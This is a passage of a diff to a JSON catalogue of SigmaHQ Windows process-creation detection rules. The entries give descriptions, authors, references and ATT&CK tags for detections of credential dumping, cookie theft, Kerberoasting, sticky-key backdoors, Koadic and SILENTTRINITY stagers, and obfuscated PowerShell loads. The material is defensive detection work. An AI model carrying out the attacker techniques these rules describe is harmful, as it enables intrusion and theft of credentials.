log4j exploitation)", - "meta": { - "author": "Andreas Hunkeler (@Karneades), Nasreddine Bencherchali", - "creation_date": "2021/12/17", - "falsepositive": [ - "Legitimate calls to system binaries", - "Company specific internal usage" - ], - "filename": "proc_creation_win_shell_spawn_by_java.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_by_java.yml" - ], - "tags": [ - "attack.initial_access", - "attack.persistence", - "attack.privilege_escalation" - ] - }, - "uuid": "dff1e1cc-d3fd-47c8-bfc2-aeb878a754c0", - "value": "Shells Spawned by Java" - }, - { - "description": "Detects a suspicious child process of a Windows shell", - "meta": { - "author": "Florian Roth, Tim Shelton", - "creation_date": "2018/04/06", - "falsepositive": [ - "Administrative scripts", - "Microsoft SCCM" - ], - "filename": "proc_creation_win_shell_spawn_susp_program.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://mgreen27.github.io/posts/2018/04/02/DownloadCradle.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_shell_spawn_susp_program.yml" - ], - "tags": [ - "attack.execution", - "attack.defense_evasion", - "attack.t1059.005", - "attack.t1059.001", - "attack.t1218" - ] - }, - "uuid": "3a6586ad-127a-4d3b-a677-1e6eacdf8fde", - "value": "Windows Shell Spawning Suspicious Program" - }, - { - "description": "Detects SILENTTRINITY stager use", - "meta": { - "author": "Aleksey Potapov, oscd.community", - "creation_date": "2019/10/22", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_silenttrinity_stage_use.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/byt3bl33d3r/SILENTTRINITY", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_silenttrinity_stage_use.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1071" - ] - }, - "uuid": "03552375-cc2c-4883-bbe4-7958d5a980be", - "value": "SILENTTRINITY Stager Execution" - }, - { - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/16", - "falsepositive": [ - "Legitimate administration activities" - ], - "filename": "proc_creation_win_software_discovery.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", - "https://github.com/harleyQu1nn/AggressorScripts", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_software_discovery.yml" + "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", + "https://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_malware_trickbot_recon_activity.yml" ], "tags": [ "attack.discovery", - "attack.t1518" + "attack.t1482" ] }, - "uuid": "e13f668e-7f95-443d-98d2-1816a7648a7b", - "value": "Detected Windows Software Discovery" + "uuid": "410ad193-a728-4107-bc79-4419789fcbf8", + "value": "Trickbot Malware Recon Activity" }, { - "description": "Detect attacker collecting audio via SoundRecorder application.", - "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Legitimate audio capture by legitimate user." 
- ], - "filename": "proc_creation_win_soundrec_audio_capture.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1123/T1123.md", - "https://eqllib.readthedocs.io/en/latest/analytics/f72a98cb-7b3d-4100-99c3-a138b6e9ff6e.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_soundrec_audio_capture.yml" - ], - "tags": [ - "attack.collection", - "attack.t1123" - ] - }, - "uuid": "83865853-59aa-449e-9600-74b9d89a6d6e", - "value": "Audio Capture via SoundRecorder" - }, - { - "description": "Detects Service Principal Name Enumeration used for Kerberoasting", - "meta": { - "author": "Markus Neis, keepwatch", - "creation_date": "2018/11/14", - "falsepositive": [ - "Administrator Activity" - ], - "filename": "proc_creation_win_spn_enum.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://p16.praetorian.com/blog/how-to-use-kerberoasting-t1208-for-privilege-escalation", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_spn_enum.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1558.003" - ] - }, - "uuid": "1eeed653-dbc8-4187-ad0c-eeebb20e6599", - "value": "Possible SPN Enumeration" - }, - { - "description": "Detects dump of credentials in VeeamBackup dbo", + "description": "Detects attempts of decoding a base64 Gzip archive via PowerShell. 
This technique is often used as a method to load malicious content into memory afterward.", "meta": { "author": "frack113", - "creation_date": "2021/12/20", + "creation_date": "2022/12/23", "falsepositive": [ - "Unknown" + "Legitimate administrative script" ], - "filename": "proc_creation_win_sqlcmd_veeam_dump.yml", + "filename": "proc_creation_win_frombase64string_archive.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=43", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_frombase64string_archive.yml" + ], + "tags": "No established tags" + }, + "uuid": "d75d6b6b-adb9-48f7-824b-ac2e786efe1f", + "value": "Suspicious FromBase64String Usage On Gzip Archive - Process Creation" + }, + { + "description": "Detects the use of RunXCmd tool for command execution", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/24", + "falsepositive": [ + "Legitimate use by administrators" + ], + "filename": "proc_creation_win_tool_runx_as_system.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", - "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" + "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", + "https://www.d7xtech.com/free-software/runx/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tool_runx_as_system.yml" ], "tags": [ - "attack.collection", - "attack.t1005" + "attack.execution", + "attack.t1569.002", + "attack.s0029" ] }, - "uuid": "b57ba453-b384-4ab9-9f40-1038086b4e53", - "value": "VeeamBackup Database 
Credentials Dump" + "uuid": "93199800-b52a-4dec-b762-75212c196542", + "value": "RunXCmd Tool Execution As System" }, { - "description": "Detect use of sqlite binary to query the Firefox cookies.sqlite database and steal the cookie data contained within it", + "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", "meta": { - "author": "frack113", - "creation_date": "2022/04/08", + "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", + "creation_date": "2020/10/14", "falsepositive": [ - "Unknown" + "The process spawned by vsjitdebugger.exe is uncommon." ], - "filename": "proc_creation_win_sqlite_firefox_cookies.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1539/T1539.md#atomic-test-1---steal-firefox-cookies-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlite_firefox_cookies.yml" - ], - "tags": [ - "attack.credential_access", - "attack.t1539" - ] - }, - "uuid": "4833155a-4053-4c9c-a997-777fcea0baa7", - "value": "SQLite Firefox Cookie DB Access" - }, - { - "description": "Detects the usage and installation of a backdoor that uses an option to register a malicious debugger for built-in tools that are accessible in the login screen", - "meta": { - "author": "Florian Roth, @twjackomo, Jonhnathan Ribeiro, oscd.community", - "creation_date": "2018/03/15", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_stickykey_like_backdoor.yml", - "level": "critical", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stickykey_like_backdoor.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.persistence", - "attack.t1546.008", - "car.2014-11-003", - "car.2014-11-008" - ] - }, - "uuid": "2fdefcb3-dbda-401e-ae23-f0db027628bc", - "value": "Sticky Key Like Backdoor Usage" - }, - { - "description": "By replacing the sticky keys executable with the local admins CMD executable, an attacker is able to access a privileged windows console session without authenticating to the system.\nWhen the sticky keys are \"activated\" the privilleged shell is launched.\n", - "meta": { - "author": "Sreeman", - "creation_date": "2020/02/18", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml", + "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.fireeye.com/blog/threat-research/2017/03/apt29_domain_frontin.html", - "https://www.clearskysec.com/wp-content/uploads/2020/02/ClearSky-Fox-Kitten-Campaign-v1.pdf", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sticky_keys_unauthenticated_privileged_cmd_access.yml" - ], - "tags": [ - "attack.t1546.008", - "attack.privilege_escalation" - ] - }, - "uuid": "1070db9a-3e5d-412e-8e7b-7183b616e1b3", - "value": "Sticky-Key Backdoor Copy Cmd.exe" - }, - { - "description": "Detects the use of stordiag.exe to execute schtasks.exe systeminfo.exe and fltmc.exe", - "meta": { - "author": "Austin Songer (@austinsonger)", - "creation_date": "2021/10/21", - "falsepositive": [ - "Legitimate usage of stordiag.exe." 
- ], - "filename": "proc_creation_win_stordiag_execution.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://strontic.github.io/xcyclopedia/library/stordiag.exe-1F08FC87C373673944F6A7E8B18CD845.html", - "https://twitter.com/eral4m/status/1451112385041911809", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_stordiag_execution.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "961e0abb-1b1e-4c84-a453-aafe56ad0d34", - "value": "Execution via stordiag.exe" - }, - { - "description": "Ntvdm.exe allows the execution of 16-bit Windows applications on 32-bit Windows operating systems, as well as the execution of both 16-bit and 32-bit DOS applications", - "meta": { - "author": "frack113", - "creation_date": "2022/07/16", - "falsepositive": [ - "Legitimate use" - ], - "filename": "proc_creation_win_susp_16bit_application.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/windows/compatibility/ntvdm-and-16-bit-app-support", - "https://support.microsoft.com/fr-fr/topic/an-ms-dos-based-program-that-uses-the-ms-dos-protected-mode-interface-crashes-on-a-computer-that-is-running-windows-7-5dc739ea-987b-b458-15e4-d28d5cca63c7", - "https://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/", - "https://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_16bit_application.yml" + "https://twitter.com/pabraeken/status/990758590020452353", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Vsjitdebugger/", + "https://docs.microsoft.com/en-us/visualstudio/debugger/debug-using-the-just-in-time-debugger?view=vs-2019", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" ], "tags": [ + "attack.t1218", "attack.defense_evasion" ] }, - "uuid": "16905e21-66ee-42fe-b256-1318ada2d770", - "value": "Start of NT Virtual DOS Machine" + "uuid": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "value": "Malicious PE Execution by Microsoft Visual Studio Debugger" }, { - "description": "Detects the use of 3proxy, a tiny free proxy server", + "description": "Detects command line parameters used by Koadic hack tool", "meta": { - "author": "Florian Roth", - "creation_date": "2022/09/13", + "author": "wagga, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2020/01/12", "falsepositive": [ - "Administrative activity" + "Unknown" ], - "filename": "proc_creation_win_susp_3proxy_usage.yml", + "filename": "proc_creation_win_hack_koadic.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/3proxy/3proxy", - "https://blog.talosintelligence.com/2022/09/lazarus-three-rats.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_3proxy_usage.yml" + "https://unit42.paloaltonetworks.com/unit42-sofacy-groups-parallel-attacks/", + "https://github.com/offsecginger/koadic/blob/457f9a3ff394c989cdb4c599ab90eb34fb2c762c/data/stager/js/stdlib.js", + "https://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hack_koadic.yml" ], "tags": [ - "attack.command_and_control", - "attack.t1572" + "attack.execution", + "attack.t1059.003", + "attack.t1059.005", + "attack.t1059.007" ] }, - "uuid": "f38a82d2-fba3-4781-b549-525efbec8506", - "value": "3Proxy Usage" + "uuid": "5cddf373-ef00-4112-ad72-960ac29bac34", + "value": "Koadic Execution" }, { - "description": "An adversary may compress or encrypt data that is collected 
prior to exfiltration using 3rd party utilities", + "description": "Disables HTTP logging on a Windows IIS web server as seen by Threat Group 3390 (Bronze Union)", "meta": { "author": "frack113", - "creation_date": "2021/07/27", + "creation_date": "2022/01/09", "falsepositive": [ - "Command line parameter combinations that contain all included strings" + "Unknown" ], - "filename": "proc_creation_win_susp_7z.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7z.yml" - ], - "tags": [ - "attack.collection", - "attack.t1560.001" - ] - }, - "uuid": "9fbf5927-5261-4284-a71d-f681029ea574", - "value": "Compress Data and Lock With Password for Exfiltration With 7-ZIP" - }, - { - "description": "Detects a suspicious 7zip execution that involves a file with a .dmp extension, which could be a step in a process of dump file exfiltration", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/27", - "falsepositive": [ - "Legitimate use of 7-Zip with a command line in which .dmp appears accidentally" - ], - "filename": "proc_creation_win_susp_7zip_dmp.yml", + "filename": "proc_creation_win_iis_http_logging.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2022/09/26/bumblebee-round-two/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_7zip_dmp.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.002/T1562.002.md#atomic-test-1---disable-windows-iis-http-logging", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_http_logging.yml" ], "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.defense_evasion", + "attack.t1562.002" ] }, - "uuid": "ec570e53-4c76-45a9-804d-dc3f355ff7a7", - "value": "7Zip Compressing Dump Files" + "uuid": "e4ed6030-ffe5-4e6a-8a8a-ab3c1ab9d94e", + "value": "Disable Windows IIS HTTP Logging" }, { - "description": "Detects suspicious command line that adds an account to the local administrators/administrateurs group", + "description": "Adversaries may enumerate browser bookmarks to learn more about compromised hosts.\nBrowser bookmarks may reveal personal information about users (ex: banking sites, interests, social media, etc.) as well as details about\ninternal network resources such as servers, tools/dashboards, or other related infrastructure.\n", "meta": { - "author": "Florian Roth, Nasreddine Bencherchali", - "creation_date": "2022/08/12", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_add_local_admin.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html?m=1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_local_admin.yml" - ], - "tags": [ - "attack.persistence", - "attack.t1098" - ] - }, - "uuid": "ad720b90-25ad-43ff-9b5e-5c841facc8e5", - "value": "Add User to Local Administrators" - }, - { - "description": "Detects suspicious command line in which a user gets added to the local Remote Desktop Users group", - "meta": { - "author": "Florian Roth", - "creation_date": "2021/12/06", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_add_user_remote_desktop.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ 
- "https://www.microsoft.com/security/blog/2021/11/16/evolving-trends-in-iranian-threat-actor-activity-mstic-presentation-at-cyberwarcon-2021/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_add_user_remote_desktop.yml" - ], - "tags": [ - "attack.persistence", - "attack.lateral_movement", - "attack.t1133", - "attack.t1136.001", - "attack.t1021.001" - ] - }, - "uuid": "ffa28e60-bdb1-46e0-9f82-05f7a61cc06e", - "value": "Suspicious Add User to Remote Desktop Users Group" - }, - { - "description": "Detects the execution of a AdFind for enumeration based on it's commadline flags", - "meta": { - "author": "frack113", + "author": "frack113, Nasreddine Bencherchali", "creation_date": "2021/12/13", - "falsepositive": [ - "Administrative activity" - ], - "filename": "proc_creation_win_susp_adfind_enumeration.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.joeware.net/freetools/tools/adfind/", - "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1087.002/T1087.002.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_enumeration.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1087.002" - ] - }, - "uuid": "455b9d50-15a1-4b99-853f-8d37655a4c1b", - "value": "Suspicious AdFind Enumeration" - }, - { - "description": "AdFind continues to be seen across majority of breaches. 
It is used to domain trust discovery to plan out subsequent steps in the attack chain.", - "meta": { - "author": "Janantha Marasinghe (https://github.com/blueteam0ps), FPT.EagleEye Team, omkar72, oscd.community", - "creation_date": "2021/02/02", - "falsepositive": [ - "Legitimate admin activity" - ], - "filename": "proc_creation_win_susp_adfind_usage.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://www.joeware.net/freetools/tools/adfind/", - "https://thedfirreport.com/2020/05/08/adfind-recon/", - "https://thedfirreport.com/2021/01/11/trickbot-still-alive-and-well/", - "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", - "https://social.technet.microsoft.com/wiki/contents/articles/7535.adfind-command-examples.aspx", - "https://github.com/center-for-threat-informed-defense/adversary_emulation_library/blob/bf62ece1c679b07b5fb49c4bae947fe24c81811f/fin6/Emulation_Plan/Phase1.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adfind_usage.yml" - ], - "tags": [ - "attack.discovery", - "attack.t1018", - "attack.t1087.002", - "attack.t1482", - "attack.t1069.002" - ] - }, - "uuid": "9a132afa-654e-11eb-ae93-0242ac130002", - "value": "AdFind Usage Detection" - }, - { - "description": "This tool enables enumeration and exporting of all DNS records in the zone for recon purposes of internal networks Python 3 and python.exe must be installed,\nUsee to Query/modify DNS records for Active Directory integrated DNS via LDAP\n", - "meta": { - "author": "frack113", - "creation_date": "2022/01/01", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_susp_adidnsdump.yml", + "filename": "proc_creation_win_susp_where_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - 
"https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md#atomic-test-9---remote-system-discovery---adidnsdump", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_adidnsdump.yml" + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1217/T1217.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_where_execution.yml" ], "tags": [ "attack.discovery", - "attack.t1018" + "attack.t1217" ] }, - "uuid": "26d3f0a2-f514-4a3f-a8a7-e7e48a8d9160", - "value": "Suspicious Execution of Adidnsdump" - }, - { - "description": "Detects the execution of AdvancedRun utility", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/20", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_advancedrun.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/splinter_code/status/1483815103279603714", - "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", - "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun.yml" - ], - "tags": "No established tags" - }, - "uuid": "d2b749ee-4225-417e-b20e-a8d2193cbb84", - "value": "Suspicious AdvancedRun Execution" - }, - { - "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", - "meta": { - "author": "Florian Roth", - "creation_date": "2022/01/20", - "falsepositive": [ - "Unknown" - ], - "filename": 
"proc_creation_win_susp_advancedrun_priv_user.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/splinter_code/status/1483815103279603714", - "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", - "https://elastic.github.io/security-research/malware/2022/01/01.operation-bleeding-bear/article/", - "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_advancedrun_priv_user.yml" - ], - "tags": "No established tags" - }, - "uuid": "fa00b701-44c6-4679-994d-5a18afa8a707", - "value": "Suspicious AdvancedRun Runas Priv User" - }, - { - "description": "RemoteFXvGPUDisablement.exe is an abusable, signed PowerShell host executable that was introduced in Windows 10 and Server 2019 (OS Build 17763.1339).", - "meta": { - "author": "frack113", - "creation_date": "2021/07/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_athremotefxvgpudisablementcommand.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md", - "https://github.com/redcanaryco/AtomicTestHarnesses/blob/7e1e4da116801e3d6fcc6bedb207064577e40572/TestHarnesses/T1218_SignedBinaryProxyExecution/InvokeRemoteFXvGPUDisablementCommand.ps1", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_athremotefxvgpudisablementcommand.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "a6fc3c46-23b8-4996-9ea2-573f4c4d88c5", - "value": "Abusable Invoke-ATHRemoteFXvGPUDisablementCommand" - }, - { - "description": "Detects base64 encoded powershell 'Invoke-' call", - "meta": 
{ - "author": "pH-T", - "creation_date": "2022/05/20", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_base64_invoke.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_invoke.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "6385697e-9f1b-40bd-8817-f4a91f40508e", - "value": "Suspicious Base64 Encoded Powershell Invoke" - }, - { - "description": "Detects suspicious base64 encoded and obbfuscated LOAD string often used for reflection.assembly load", - "meta": { - "author": "pH-T", - "creation_date": "2022/03/01", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_susp_base64_load.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/Raccine/blob/20a569fa21625086433dcce8bb2765d0ea08dcb6/yara/mal_revil.yar", - "https://thedfirreport.com/2022/05/09/seo-poisoning-a-gootloader-story/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_base64_load.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.001", - "attack.defense_evasion", - "attack.t1027" - ] - }, - "uuid": "9c0295ce-d60d-40bd-bd74-84673b7592b1", - "value": "Suspicious Encoded Obfuscated LOAD String" - }, - { - "description": "Detects, possibly, malicious unauthorized usage of bcdedit.exe", - "meta": { - "author": "@neu5ron", - "creation_date": "2019/02/07", - "falsepositive": "No established falsepositives", - "filename": "proc_creation_win_susp_bcdedit.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - 
"https://docs.microsoft.com/en-us/windows-hardware/drivers/devtest/bcdedit--set", - "https://twitter.com/malwrhunterteam/status/1372536434125512712/photo/2", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bcdedit.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1070", - "attack.persistence", - "attack.t1542.003" - ] - }, - "uuid": "c9fbe8e9-119d-40a6-9b59-dd58a5d84429", - "value": "Possible Ransomware or Unauthorized MBR Modifications" - }, - { - "description": "Execute VBscript code that is referenced within the *.bgi file.", - "meta": { - "author": "Beyu Denis, oscd.community", - "creation_date": "2019/10/26", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_bginfo.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Bginfo/", - "https://oddvar.moe/2017/05/18/bypassing-application-whitelisting-with-bginfo/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bginfo.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.005", - "attack.defense_evasion", - "attack.t1218", - "attack.t1202" - ] - }, - "uuid": "aaf46cdc-934e-4284-b329-34aa701e3771", - "value": "Application Whitelisting Bypass via Bginfo" - }, - { - "description": "Detects transferring files from system on a server bitstransfer Powershell cmdlets", - "meta": { - "author": "Austin Songer @austinsonger", - "creation_date": "2021/08/19", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_susp_bitstransfer.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://docs.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps", - 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_bitstransfer.yml"
- ],
- "tags": [
- "attack.exfiltration",
- "attack.persistence",
- "attack.t1197"
- ]
- },
- "uuid": "cd5c8085-4070-4e22-908d-a5b3342deb74",
- "value": "Suspicious Bitstransfer via PowerShell"
- },
- {
- "description": "Detects execution of a set of builtin commands often used in recon stages by different attack groups",
- "meta": {
- "author": "Florian Roth, Markus Neis",
- "creation_date": "2018/08/22",
- "falsepositive": [
- "False positives depend on scripts and administrative tools used in the monitored environment"
- ],
- "filename": "proc_creation_win_susp_builtin_commands_recon.yml",
- "level": "medium",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/haroonmeer/status/939099379834658817",
- "https://twitter.com/c_APT_ure/status/939475433711722497",
- "https://www.fireeye.com/blog/threat-research/2016/05/targeted_attacksaga.html",
- "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_builtin_commands_recon.yml"
- ],
- "tags": [
- "attack.discovery",
- "attack.t1087",
- "attack.t1082",
- "car.2016-03-001"
- ]
- },
- "uuid": "2887e914-ce96-435f-8105-593937e90757",
- "value": "Reconnaissance Activity Using BuiltIn Commands"
- },
- {
- "description": "Detects suspicious use of 'calc.exe' with command line parameters or in a suspicious directory, which is likely caused by some PoC or detection evasion",
- "meta": {
- "author": "Florian Roth",
- "creation_date": "2019/02/09",
- "falsepositive": [
- "Unknown"
- ],
- "filename": "proc_creation_win_susp_calc.yml",
- "level": "high",
- "logsource.category": "process_creation",
- "logsource.product": "windows",
- "refs": [
- "https://twitter.com/ItsReallyNick/status/1094080242686312448",
- 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_calc.yml"
- ],
- "tags": [
- "attack.defense_evasion",
- "attack.t1036"
- ]
- },
